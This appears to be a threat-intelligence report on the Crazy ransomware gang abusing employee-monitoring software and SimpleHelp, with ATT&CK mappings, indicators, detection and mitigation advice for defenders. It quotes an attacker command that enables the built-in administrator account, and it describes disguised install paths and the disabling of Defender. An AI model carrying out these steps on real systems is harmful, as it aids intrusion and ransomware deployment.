Full Report
A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. [...]
Analysis Summary
# Tool/Technique: Net Monitor for Employees Professional (NME Pro) & SimpleHelp
## Overview
Members of the Crazy ransomware gang are abusing legitimate employee monitoring software (Net Monitor for Employees Professional) and the SimpleHelp remote support tool to maintain persistence, evade detection, and prepare for ransomware deployment within corporate networks. These tools allow attackers to blend in with normal administrative activity.
## Technical Details
- Type: Tool (Legitimate Software Abused)
- Platform: Windows
- Capabilities: Remote desktop viewing, file transfer, command execution, system monitoring, activity logging, command execution via monitoring rules.
- First Seen: Context implies ongoing activity around February 2026.
## MITRE ATT&CK Mapping
*Note: Mappings target the *abuse* of these legitimate tools for malicious purposes.*
- TA0003 - Persistence
- T1543.003 - Create or Modify System Process: Windows Service (Installation methods may achieve this)
- TA0011 - Command and Control
- T1071.001 - Application Layer Protocol: Web Protocols (Likely used by the remote access tools)
- TA0005 - Defense Evasion
- T1218 - Signed Binary Proxy Execution (Evidenced by `msiexec.exe` usage)
- TA0008 - Lateral Movement
- T1021 - Remote Services (SimpleHelp/NME Pro provide primary remote access)
## Functionality
### Core Capabilities
* **Remote Access & Control:** Provided full interactive remote access to compromised systems via both NME Pro (desktop viewing, file transfer, command execution) and SimpleHelp.
* **Persistence:** SimpleHelp was installed via PowerShell commands, disguised with filenames like `vshost.exe` or placed in directories mimicking legitimate services (`C:\ProgramData\OneDriveSvc\OneDriveSvc.exe`), ensuring redundant access even if NME Pro was removed.
* **Execution:** Attackers utilized the monitoring software to remotely execute commands against systems.
### Advanced Features
* **Custom Monitoring/Staging:** Attackers configured monitoring rules within the SimpleHelp agent to specifically surveil activity related to cryptocurrency wallets (e.g., metamask, exodus, binance, kucoin) and other remote access tools (RDP, anydesk, teamview, VNC). This suggests preparation for potential cryptocurrency theft alongside ransomware deployment.
* **Defense Evasion:** Attackers attempted to disable Windows Defender by stopping and deleting associated services.
* **Privilege Escalation:** Attempted to enable the built-in administrator account using: `net user administrator /active:yes`.
## Indicators of Compromise
- File Hashes: N/A (Not provided in the text)
- File Names:
* SimpleHelp payload disguised as: `vshost.exe`
* SimpleHelp installation path disguised: `C:\ProgramData\OneDriveSvc\OneDriveSvc.exe`
- Registry Keys: N/A
- Network Indicators: Overlapping C2 infrastructure observed across incidents (details not specified/defanged).
- Behavioral Indicators:
* Installation of NME Pro via `msiexec.exe`.
* PowerShell used to download and install SimpleHelp.
* System process modifications related to disabling Windows Defender services.
* Monitoring agent cycling trigger/reset events based on keywords related to crypto wallets and exchanges.
## Associated Threat Actors
- Crazy ransomware gang (A single operator or group is strongly suggested across observed intrusions).
## Detection Methods
- Signature-based detection: Not explicitly mentioned for the abused tools themselves, but signatures against the *specific malicious file hashes* of the installed SimpleHelp payloads could be effective.
- Behavioral detection: Monitoring for unauthorized installations of remote monitoring/support tools; monitoring for commands disabling Defender services; monitoring for processes utilizing legitimate remote access tools outside of standard administrative change windows.
- YARA rules: N/A
## Mitigation Strategies
* Organizations must closely monitor for unauthorized installations of remote monitoring and support tools like NME Pro and SimpleHelp.
* Enforce Multi-Factor Authentication (MFA) on all remote access services, particularly SSL VPNs, as initial breaches occurred via compromised credentials for these services.
* Verify the legitimacy of execution streams involving `msiexec.exe` and PowerShell when downloading and installing administrative software.
## Related Tools/Techniques
- SimpleHelp (already abused by DragonForce ransomware group in MSP supply chain attacks).
- General abuse of legitimate remote management and monitoring tools (RMMs) in ransomware operations.